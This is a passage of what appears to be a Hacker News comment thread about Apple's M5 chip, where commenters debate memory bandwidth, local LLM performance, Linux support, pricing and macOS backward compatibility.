        Remember that Asahi works properly only on the M1 and M2. More work is required to make it run well on later chips (each generation isn't just a faster ARM chip: it brings a new GPU, a new motherboard chipset, changed laptop peripherals, new boot firmware, etc., and they all need reverse-engineered drivers to work).

    • ed_mercer 9 hours ago

      Would it be possible to run a whole Linux OS on macOS, even if through virtualization?

    • imoverclocked 13 hours ago

      ... or UTM. I have run Windows and Linux on my M1 MB Pro with plenty of success.

      Windows, because I needed it for a single application.

      Linux has been extremely useful as a complement to the small ARM SBCs I run. E.g., compiling a kernel is much faster there than on (say) a Raspberry Pi. Also, USB device sharing makes working with vfat/ext4 filesystems on small memory cards a breeze.

  • bee_rider 8 hours ago

    It sounds like Linux works fairly well on Strix Halo, which basically gives Apple a run for their money and stays in the nice x86 land. The M1 and M2 chips were envy-inducing chips from the heavens or whatever, but now that the mortals have caught up I don’t really see the point in worrying about Linux on ARM. X86 remains the present, RISC-V is the future.

  • geek_at 14 hours ago

    I'm still looking for a decent ARM laptop that runs Linux well. I have my eye on one from Lenovo, but Linux support is still not the best.

  • drcode 13 hours ago

    M1 and M2 Macs run Asahi Linux very well (but there's no option for the M3, M4, or M5 yet).

  • baka367 5 hours ago

    Meanwhile, I finally bought into Apple after my nth unsuccessful attempt to break into Linux.

    I just want a Linux-like system that isn't painful to use, and Apple's is the closest thing that worked for me without resorting to last-ditch efforts like sacrificing virgin maidens or newborn kittens on top of my Dell machine. Apple provides one that just works... reliably.

    • stevage 5 hours ago

      Ha, I came crawling back to macOS after a couple of years' dalliance with Windows. It was not a good experience.

  • visionscaper 6 hours ago

    Isn't the core of macOS derived from Unix?

  • a456463 12 hours ago

    I came to chime in. I have hardware that Apple chooses to willfully upsell me on repairing: $1500 for a $35 keyboard repair. Apple as a company is still terrible at recycling and practices manufactured obsolescence. It is also a walled garden with no choice as to what you can do on your machines.

  • jokoon 12 hours ago

    Honestly, computing speed doesn't matter that much anymore.

    I mean, as long as Wirth's law doesn't bite too hard.

  • gffrd 14 hours ago

    [flagged]

    • jokoon 12 hours ago

      [flagged]

      • gffrd 6 hours ago

        My point was: we don’t need to list all the reasons we won’t buy apple products on any post about apple, even if it has nothing to do with the article.

        We’ve beaten the horse many times over.

gr4vityWall 11 hours ago

If only the Linux support were good, or any other Unix-like that made it usable without having to deal with macOS. It's a shame, because the hardware is top tier.

gmm1990 20 hours ago

Interesting that there's only the M5 on the MacBook Pro. I thought the M4 and the M4 Pro/Max launched at the same time on the MacBook Pro.

GeekyBear 19 hours ago

I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

  • bigyabai 17 hours ago

    I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

    It's an improvement, nomenclature-wise.

gzer0 20 hours ago

The M5 chip is currently only available with up to 32 GB of RAM, on the 14-inch MacBook Pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

  • pixelpoet 20 hours ago

    That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!

    • hannesfur 19 hours ago

      As pointed out elsewhere, a better comparison will be the upcoming Pro and Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference, not the little AI accelerator AMD put on there; that one is just too limited.

    • Tepix 19 hours ago

      So you're saying these won't sell at all?

      • pixelpoet 19 hours ago

        I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

        I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by memory capacity and bandwidth.
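
        The bandwidth number is the one that matters most for LLM use: decode speed on a large model is roughly memory bandwidth divided by the bytes of weights read per token (figures illustrative):

            # ~20 GB of quantized weights streamed per token at 153 GB/s:
            echo "$(( 153 / 20 )) tokens/s"  # ~7 tokens/s upper bound, before compute limits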

balderdash 8 hours ago

I find the Apple naming conventions / product updates confusing.

The MacBook Pro with the M5 is the low-end model? An M2 Ultra is better than the M5?

I understand what they're doing from a roadmap standpoint, but as a pure consumer it's a bit confusing.

allenrb 16 hours ago

I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

  • wina 16 hours ago

    Why do you want more CPU cores and better performance than the M4, if not for running local AI models?

    • Remnant44 15 hours ago

      Essentially every other use case for a computer.

      Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

    • sib 16 hours ago

      Photo & video post-processing...

    • allenrb 12 hours ago

      I… think you’re joking, but I can’t be sure.

    • adastra22 16 hours ago

      CPU cores aren't relevant to running AI?

textlapse 15 hours ago

I wonder how much the Nvidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; the M5 MBP has higher performance, comes with a monitor attached, and has a (slightly) lower price tag.

If you could yank the screen out, it probably evens out :)

I've seen quite a few announcements from competitors land this close together, and I wonder if they do competitor analysis so they can precede the Goliath by a few days (like Google vs. the rest, Apple vs. the rest, etc.).

zhyder 14 hours ago

"complementing the Neural Accelerators in the CPU and GPU" seems to be a misprint; I don't believe they have the accelerators in the CPU too.

Still super interesting architecture with accelerators in each GPU core _and_ a dedicated neural engine. Any links to software documentation for how to leverage both together, or when to leverage one vs the other?

umvi 14 hours ago

I would buy a mac mini with an M* chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit

  • NetMageSCW 10 hours ago

    You’re in luck then, it doesn’t double the cost.

    • umvi 7 hours ago

      It's pretty close to double. Sorry, but I just can't justify $400 for a measly 16GB of RAM

alberth 20 hours ago

The Vision Pro went from M2 to M5; that's quite a jump in horsepower.

  • adamschwartz 17 hours ago

    Also ~200g heavier due in part to the counterweight in the new strap.

    • cagenut 7 hours ago

      hmmm, that's 200g in the wrong direction

sebastianconcpt 20 hours ago

Wonder how it compares with the M4 Max that I've just bought haha

  • dmix 20 hours ago

    Same, I just bought an M4 Max two weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released the M5 Max yet.

    • sebastianconcpt 20 hours ago

      It's going to be fine, what's important is what we do with the thingy :)

      Logos is King

thefounder 7 hours ago

Is my M2 Ultra Studio with 128 GB of RAM just "dead weight" now? Wish I had just gotten a Mac Mini or Mac Pro….

zoobab 20 hours ago

Does it run Linux?

  • amlib 11 hours ago

    It also doesn't run Crysis, and if it were left to Apple to decide, it wouldn't even run DOOM.

criddell 19 hours ago

I wish I could get the nano-texture glass on a lower-spec iPad Pro. I probably only need the 512 GB model, but the glass is only available on the 1 and 2 TB models.

anuraj 13 hours ago

Too underwhelming. Apple under Tim Cook has been running out of steam. What prevents Apple from shipping hundreds of GPU cores and higher memory bandwidth? They need to catch the AI wave before they perish under it.

  • ed_mercer 8 hours ago

    Underwhelming? They are crushing the competition by a large margin.

  • pertymcpert 13 hours ago

    What are you talking about? People love Macs for running local LLMs.

    • hu3 12 hours ago

      For real work tho? My colleagues couldn't get past toy demos.

      And it ruins battery life.

      For coding it's on par with GPT3 at best which is amateur tier these days.

      It's good for text to speech and speech to text but PCs can do that too.

      • cactusplant7374 11 hours ago

        Why would anyone run AI workloads without being plugged in? It's going to trash your battery.

maxk42 18 hours ago

For my use case I need MSL to support fp64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s, and they're not producing something I can even tinker with AI on in my spare time. Apple has lost the AI war before it even got started, IMO.

jon-wood 20 hours ago

> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

  • asdhtjkujh 19 hours ago

    Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental. Selling outdated hardware that will become obsolete sooner is not more environmentally friendly.

    Hardware longevity and quality are probably the least valid criticisms of the current MacBook lineup. Most of the industry produces future landfill at an alarming rate.

  • nozzlegear 7 hours ago

    Surely people just won't buy it if it's not worth shipping?

  • Cthulhu_ 19 hours ago

    I'm always skeptical about these carbon-neutral pledges because in practice it's a lot of administrative magic, like paying a company that says it will plant trees or whatever and will sign some official-looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

    And it's things like not including a charger, cable, or headphones anymore to reduce package size, which, sure, will save a little on emissions, but it's moot because people will still need those things.

  • SG- 19 hours ago

    The second-hand Apple market is very big, especially since the M-series MacBooks leapfrogged performance.

benjaminclauss 20 hours ago

Despite the flak Apple gets, their M-series continues to impress me as I learn more about hardware.

jbjbjbjb 20 hours ago

I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.

jasoneckert 21 hours ago

With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.

elnatro 13 hours ago

I don’t understand why they don’t advertise this CPU as one capable of running local LLMs, because it can, right?

perdomon 13 hours ago

It's kind of crazy that they insist on doing basically one of these every year. A lot of people complain that the iPhone stopped changing (meaningfully) between updates several years back. I think Apple Silicon is bound to be the same. I will say that the M4 Mac Mini was groundbreaking in terms of a budget-friendly Apple product -- I hope they recognized why it was loved and continue to iterate in that direction.

rcarmo 17 hours ago

I'll take one inside an iPad mini, thank you very much.

randomtoast 21 hours ago

A unified memory bandwidth of 1,224 gigabits per second is quite impressive.

  • vardump 21 hours ago

    Probably gigabytes (GB) and not gigabits (Gb)?

    Edit: gigabits indeed. Confusing; my old M2 Max has 400 GB/s (3,200 gigabits per second) of bandwidth. I guess it's some sort of baseline figure for the lowest-end configuration?

    Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.
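
    The unit math, as a quick sketch (the 4x Max scaling is pure speculation on my part):

      // 1,224 gigabits across 8 bits per byte = 153 gigabytes.
      let gigabits = 1_224.0
      let gigabytesPerSec = gigabits / 8      // 153 GB/s
      // Speculative: a Max-class part with a 4x-wider bus.
      let maxGuess = gigabytesPerSec * 4      // 612 GB/s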

  • mihau 21 hours ago

    Why? The M3 Ultra already had 800 GB/s (6,400 Gbps) of memory bandwidth.

    • NetMageSCW 20 hours ago

      But what did the base M3 have? Why compare across different categories?

      Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

    • sapiogram 20 hours ago

      And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.

      • Aurornis 20 hours ago

        High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

        The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

        • NetMageSCW 10 hours ago

          The other advantage is you don’t have to transfer assets across slow buses to get it into that high speed VRAM.

      • RossBencina 20 hours ago

        Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).

      • Rohansi 17 hours ago

        And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.
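
        Back-of-envelope for that claim (a sketch; the 128-bit bus width is an assumption, though it's typical for these laptops):

          // GB/s = MT/s * bus width in bits / 8 bits-per-byte / 1000
          let transfersPerSec = 8_533.0      // MT/s
          let busWidthBits = 128.0           // assumed 128-bit bus
          let gbPerSec = transfersPerSec * busWidthBits / 8 / 1_000  // ~136.5 GB/s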

  • Havoc 20 hours ago

    I was looking at that number and thinking the opposite: that's oddly slow, at least in the context of a new Apple chip.

    Guessing that's their base tier and it'll increase on the higher spec/more mem models.

    • Retr0id 20 hours ago

      Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.

  • modeless 20 hours ago

    Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.
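
    The usual back-of-envelope: single-stream decode is memory-bandwidth bound, because every active weight gets read once per generated token. A sketch, ignoring KV cache and compute (the 70B-at-4-bit example is illustrative):

      // tokens/sec ≈ bandwidth / (active params * bytes per param)
      func tokensPerSec(bandwidthGB: Double, paramsBillions: Double,
                        bytesPerParam: Double) -> Double {
          bandwidthGB / (paramsBillions * bytesPerParam)
      }
      print(tokensPerSec(bandwidthGB: 273, paramsBillions: 70, bytesPerParam: 0.5)) // ~7.8 t/s, Spark
      print(tokensPerSec(bandwidthGB: 153, paramsBillions: 70, bytesPerParam: 0.5)) // ~4.4 t/s, M5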

    • hannesfur 19 hours ago

      > All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

      That’s true for the on-GPU memory, but I think there is some subtlety here. MoE models have narrowed the gap considerably in my opinion: not all experts may fit into GPU memory, but with a fast enough bus you can stream them into place when necessary.
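
      A toy sketch of that streaming idea (purely illustrative; the types and the routing are made up, and real runtimes are far more clever):

        struct Expert { let weights: [Float] }

        // 64 "experts" in the big, slow pool (system RAM stand-in).
        let slowStore = (0..<64).map { _ in Expert(weights: [Float](repeating: 1, count: 1_000)) }
        var fastPool: [Int: Expert] = [:]  // stands in for GPU-resident memory

        func forward(_ token: [Float], routedTo ids: [Int]) -> Float {
            // Stream only the routed experts across the bus, on demand.
            for id in ids where fastPool[id] == nil {
                fastPool[id] = slowStore[id]
            }
            return ids.reduce(0) { sum, id in
                sum + zip(token, fastPool[id]!.weights).map(*).reduce(0, +)
            }
        }
        print(forward([Float](repeating: 0.5, count: 1_000), routedTo: [3, 17]))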

      But the key difference is the type of memory. While NVIDIA's data-center GPUs have shipped with HBM for a while now (gaming cards use GDDR), the DGX Spark and Apple's M series use LPDDR5X, which is the main source of their memory bottleneck. Unified-memory chips with HBM are definitely possible (GH200, GB200); they are just less power efficient at low/idle load.

      A side note on NVIDIA Grace: it actually uses both HBM3e (GPU side) and LPDDR5X (CPU side) for exactly that reason (load characteristics).

      The moat of the memory makers is just so underrated…

thurn 21 hours ago

No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.

nblgbg 19 hours ago

32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.

newman8r 14 hours ago

What's sad is there's still no Asahi support for the M4. I have one and I barely ever use it for that reason.

mrkaluzny 13 hours ago

Emm… why does it say that a charger is not included with the purchase? That's just crazy.

SXX 20 hours ago

32GB RAM limit on current M5 models. Now wait for M5 Max.

  • bombcar 20 hours ago

    M5 Max Macs

    If they're studios, you can have stacks of M5 Max Macs.

dmitshur 19 hours ago

The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.

mrbonner 18 hours ago

I'm waiting for the day the iPhone is equipped with an M chip. Not too long a wait, I hope.

airza 21 hours ago

I get that they want a lot of their own Swift-based bindings, but I wish they could also keep their MPS PyTorch bindings up to date...

Insanity 19 hours ago

I assume they released this ahead of their end-of-month event in response to all the leaks from the past few weeks.

ChuckMcM 15 hours ago

I think it would be amazing to be able to buy an M5 based open platform.

willahmad 21 hours ago

Are we going to see SOTA local coding models anytime soon with this hardware, or is there still a long way to go?

  • Etheryte 20 hours ago

    You can already do that; how slow or fast you go just depends on how much you're ready to pay for memory. It's a $1,200 premium to go from 36GB to 128GB of unified memory, and that cost is hard to justify unless you really need it, or someone else is paying.

    • willahmad 20 hours ago

      None is comparable to the GPT-5 or Sonnet 4.5 experience.

      • elzbardico 15 hours ago

        Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

        Inference speed and fast feedback matter a lot more than perfect generation to me.

sbbq 20 hours ago

The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.

aetherspawn 14 hours ago

Wish Boot Camp was free again… sick of paying for Parallels.

pier25 19 hours ago

Does the M5 feature the UltraFusion connector which would enable the Ultra variant?

  • ozaiworld 19 hours ago

    that would likely only be present on the Max chip of the M5 generation

    • pier25 16 hours ago

      thanks I had always assumed it needed to be present in the base design of the chip

jdlyga 20 hours ago

If only the Windows ecosystem could make the processor transition as smooth as Mac.

  • lostmsu 19 hours ago

    I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.

    • wmf 17 hours ago

      X Elite and N1X are fine; the problem is with Windows.

      • bigyabai 14 hours ago

        As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.

zelias 12 hours ago

Do I want to buy this, an M1 or an M4?

mittermayr 19 hours ago

This morning I was looking to maybe replace my MacBook Pro 2018, which had the horrible keyboard and finally seems crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite the widely flamed design faux pas, I've had to replace the battery twice by now, etc.).

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other year (due to broken key hinges), and I have been incredibly positively surprised after getting used to the MX Keys. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the MacBook — if I were to switch mobile computing over to Windows, what could I replace it with? My main machine is still a Mac mini M2 Pro, which is perfect value for the price. I like the Surface as a concept (replaceable keyboards are a fantastic idea; the battery, however, is super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

  • vachina 17 hours ago

    LG Gram SuperSlim. Very light (900 grams). I once went hiking with it and forgot the laptop was still in the bag.

    But it's really only capable of high performance in short bursts because of its extremely small thermal mass.

    • mittermayr 17 hours ago

      Thanks for the hint. Spec-wise this is exactly what I meant: 1 TB SSD, 16 GB RAM, 16 hours of battery, very nice. Then I saw it's 1,700 EUR where I am at the moment, so pretty much MacBook Pro price :(

waterTanuki 10 hours ago

I can't imagine how frustrating it must be to be making some of the best hardware out there only to have it completely wasted on useless "liquid glass" UIs and locked down to a half-baked OS (looking at you iPadOS).

looneysquash 17 hours ago

That's cool, but so much software only supports CUDA.

mrlonglong 17 hours ago

Good old Brits, taking over the world with an ISA so extraordinarily efficient that, at its inception, they discovered the processor kept operating on leakage current even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt.

mgaunard 15 hours ago

Why is Apple focusing on AI? Do they have any AI products like Google, Meta, or OpenAI?

warrenmiller 12 hours ago

Why only on the 14'' and not the 16''?

busymom0 17 hours ago

> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

  • supernes 16 hours ago

    They'll put it in the Mini when they push out a new Studio to upsell to.

apatheticonion 13 hours ago

Wake me up when I can play video games on my MacBook and I'll upgrade my MacBook M1 Pro.

Until then, I take a mini PC with me along with my M1 when I travel and use game streaming for gaming and offload dev and AI work via ssh + ssh remote tools.

To me, the M5 is amazing hardware, but they put square wheels on a Ferrari.

davidw 19 hours ago

Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?

kotaKat 20 hours ago

Surprised they aren’t beating the “performance per watt” drum they normally would on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap in the line for M1 and M2, tie up loose ends with Walmart on the $599 M1 Air they still make for ‘em, and start shipping the A18 Pro-based MacBooks in November.

  • ajross 15 hours ago

    They don't have a new process to launch on, so one wouldn't expect a power metric to improve at all.

exabrial 20 hours ago

Apple's software division has lost its way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32-bit has been a while now, but alas), all while retreating on stability.

Snow Leopard remains the company's crowning achievement. Zero bloatware, zero "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

  • morshu9001 14 hours ago

    I liked Snow Leopard too, it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah I don't touch any of the new features.

  • badc0ffee 17 hours ago

    I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.

    • morshu9001 12 hours ago

      They tried to make you use the App Store for Xcode and system updates, but thankfully there have been solid workarounds

  • raw_anon_1111 19 hours ago

    They completely removed hardware support for 32 bit software.

    • morshu9001 14 hours ago

      This was in the Intel generation of Macs. If Windows can support 32-bit software then so should Mac, along with all that 64-bit software that got broken in random Mac updates.

      Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

      • raw_anon_1111 14 hours ago

        Do you think they didn’t know they were moving away from Intel when they did that? Besides, code was shared between macOS and iOS even then. They removed 32-bit support from their ARM processors years before they moved to ARM-based Macs.

        • morshu9001 14 hours ago

          They probably did, but just because M1 gets released doesn't mean Intel Macs suddenly don't have 32-bit capable hardware. I get why it was easier to drop it in the new OS regardless of hardware, only it throws a lot of software under the bus, and running software is kinda the OS's main job.

          And the hardware isn't a showstopper anyway. Apple did x86-64 on AS, Windows' WoW64 does x86-32 on ARM64 or even IA-64, and I'll bet Windows would do x86-32 on x86-64 if Intel ever dropped the 32-bit mode. Wine 32-on-64 will run x86-32 on AS already.

          • raw_anon_1111 14 hours ago

            And Windows is also a bloated mess that they couldn’t use on mobile and their ARM initiatives have gone nowhere.

            If you don’t think Windows is a bloated mess, look up all of the different ways you have to represent a “string” depending on the API you are calling.

            • morshu9001 13 hours ago

              Sure, but those are unrelated. Microsoft doesn't make the chips, and Windows' crappiness is its own thing. It's not like macOS would turn to crap if they made Rosetta 2 support x86-32, or in general stopped breaking all the third-party software.

              • raw_anon_1111 13 hours ago

                Windows' crappiness is because they won't deprecate anything, ever. Read some of Raymond Chen's posts about all of the special-casing they did for apps that broke on newer versions of Windows because app developers were using unpublished APIs.

                Every bit of backwards compatibility increases the testing surface and the vulnerabilities. In fact, an early bug in Windows NT let you encode DOS shell commands in the browser URL bar from a client, and they would run with admin privileges if the server was running IIS.

                Should Apple have also kept 68K emulation around? PPC?

                • morshu9001 13 hours ago

                  Apple went the other extreme. Even if you use public APIs exactly the way they want, your software will break frequently. This is without even getting into the whole OpenGL vs Metal drama.

                  In Windows they took things a bit too far by not only supporting old stuff but also treating it as first-class. If software is too outdated, it's fair to stick it behind some compat layer that makes it slower, as long as it still runs. But that's not even the biggest problem with Windows; it's Microsoft turning it into adware, and not being Unix-like in the first place.

                  To answer your last question, yes for PPC at least. 68K is too old to matter. Emulation layer doesn't need to hold back the entire system. If it means less dev resources to spend making glass effects and emojis, fine.

                  • raw_anon_1111 8 hours ago

                    It does hold back the entire system though. It increases the attack surface of vulnerabilities and it allows companies like Adobe and Microsoft to be lazy about updating their software.

                • bigyabai 11 hours ago

                  > Should Apple have also kept 68K emulation around? PPC?

                  Yes? What kind of mercurial clown world do you live in, where you pay for software and then cheer when it's yoinked off your computer in an OTA update?

                  Even Windows users aren't whipped enough to lick their OEM's boot like that, Jesus. You'd hope Mac users would still have a spine; Apple doesn't maintain macOS as a charity, you're allowed to disagree with them.

                  • raw_anon_1111 10 hours ago

                    I don’t believe you are serious that you don’t see the issue with MacOS having

                    - A 68K emulator

                    - A PPC emulator

                    - a 32 bit x86 emulator

                    - a 32 bit ARM emulator (since ARM chips don’t have hardware to run 32 bit code)

                    And to think that Windows is a shining example of good operating system design.

                    Why not include a 65C02 emulator also so you can run AppleWorks 3.0 from 1986?

                    • morshu9001 7 hours ago

                      Maybe I'm mistaken, but I thought generic ARM (not AS) had a 32-bit mode, and in fact that's what Windows emulates x86-32 on. If not, then great: x86-32 on ARM64.

                    • bigyabai 8 hours ago

                      I don't believe you know what you're talking about, if you think that Apple's 64-bit ARM chips struggle to run 32-bit code in-userland. Especially if you're going to put words in my mouth - at no point did I ever call the Windows OS a shining example of anything. You're confirming my suspicion that you live in a mercurial clown dimension.

                      However, I will absolutely say Windows users have higher expectations from Microsoft than what Mac customers demand from Apple. Macs would get removed by force from many of the places that rely on Windows in professional settings like render farms, factory automation, and defense. There is absolutely zero tolerance for Apple's shenanigans there, and Apple offers those customers no products to take their needs seriously, unlike Microsoft. It's not a coincidence that Apple has zero buy-in outside the consumer market, not a single professional customer wants what Apple is selling if Nvidia or AMD will do the same thing with less-petty software support. We all know why products like XServe failed, poor Apple had too much pride to support the software that the industry had actual demand for.

                      While we're talking about software darwinism, I think you need to hear this; Darwin objectively sucks from a systems design standpoint, it's why nobody uses XNU unless they're forced to. It's empirically slow, deliberately neutered for third-parties, the user-exposed runtime is loaded with outdated/unnecessary crap and BSD tooling that won't work with industry-standard software, the IPC model is not secure (fight me), the capabilities are arbitrarily changed per-OS, filesystem security is second-rate like Windows/Bitlocker, the default install is bloated with literal gigabytes of deadweight binaries, both LLB and iBoot are mandatory NSA slopware blobs, and their SDK commitment is more fickle than developers playing Musical Chairs.

                      None of these kernels are good, but XNU is unique in that it is completely disposable to humanity and possesses no remaining valuable features. If macOS stopped working tomorrow, there would be no disruption to any critical infrastructure around the world. If Linux or Windows had a Y2K moment, we'd be measuring the deaths by the thousands. I'm willing to give Apple their due, but you refuse to admit they're lazy - "since ARM chips don't have hardware" my ass, on "hacker" news of all places...

                      • raw_anon_1111 8 hours ago

                        What’s there not to “believe”? There is no hardware support for 32 bit ARM instructions on Macs and iPhones. In fact there has never been 32 bit ARM Mac software. What software are you pining for from 32 bit x86 Macs?

                        Consider how shitty the x86 Windows experience is compared to modern Macs - poor battery life, loud, slow and hot - I’m really surprised at how little Windows users expect from their computers.

                        As far as the Arm based Windows computers, the x86 emulator is slower than Macs running x86 code and the processors are worse.

                        And are you really saying ARM based Macs, iPhones and iPads are slow?

                        You seem to want the Mac to be the equivalent of the “HomerMobile”.

                        No professional is buying Macs? You think that video and audio professionals as well as developers are really saying “we really want Windows computers” or did I miss the “Year of the Linux desktop”?

pzo 17 hours ago

This is quite a weird and confusing move (probably on purpose). The M5 is released in the MacBook Pro, but previous MacBook Pros had the M4 Pro or M4 Max, so these are more like the MacBook Air series, or even the iPad Pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4" but my old Macbook M2 Max have 400GB/s

LarsDu88 16 hours ago

It's disappointing to me how far behind other chipmakers are in offering a unified GPU/CPU memory bus. Only AMD's Strix Halo even attempts this. Well, this announcement tipped my hand, and I'm finally buying a new MacBook :)

jdc0589 18 hours ago

This is cool and all, but what I'm really excited about is the possibility that one day they'll update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

sneak 14 hours ago

Cool. My maxed-out M4 Max MBP is scheduled for delivery tomorrow. Guess I’ll return it.

  • ppeetteerr 14 hours ago

    The M5 Pro/Max models are likely going to arrive in March (but maybe earlier)

    • sneak 14 hours ago

      Oh, the M5s available max out at 32GB of RAM, even in the MBP. That’s a nonstarter for me in a pro machine.

sidcool 19 hours ago

I wonder if they informed Jensen about it.

superkuh 19 hours ago

I know it's only shared system RAM and not VRAM, but the M5's ~150GB/s isn't going to be very fast for AI inference. A fairly old RTX 3060 12GB does 360GB/s. But I guess quantity is a quality all of its own when it comes to RAM and inference.

GaggiX 20 hours ago

>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

tiahura 21 hours ago

No 16”?

  • adamch 21 hours ago

    They'll announce that along with M5 Pro and Max in March or so.

tonyhart7 13 hours ago

I never thought I'd see the day when I'd say an Apple device is one of the best for running LLMs.

StopDisinfo910 21 hours ago

I appreciate Apple propping up the GPU performance of their SoC but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also unleashes? Really? The marketing madness has to stop at some point.

  • dralley 19 hours ago

    Not that I've actually used any of these APIs, but supposedly Metal is the best-designed graphics API by a decent margin; it's just severely handicapped by how insular Apple and their ecosystem are.

    • Cloudef 4 hours ago

      > Metal is the best designed Graphics API

      An API that depends on the Objective-C runtime doesn't sound very good.

    • bigyabai 14 hours ago

      Depends on what you're comparing to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the Open Source alternatives, and Metal itself is a proprietary solution competing against other well-designed alternatives like DirectX and NVN.

      I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

  • mcv 20 hours ago

    Soon they'll be stomping all over your calculation problems, and then obliterating them!

thomascountz 13 hours ago

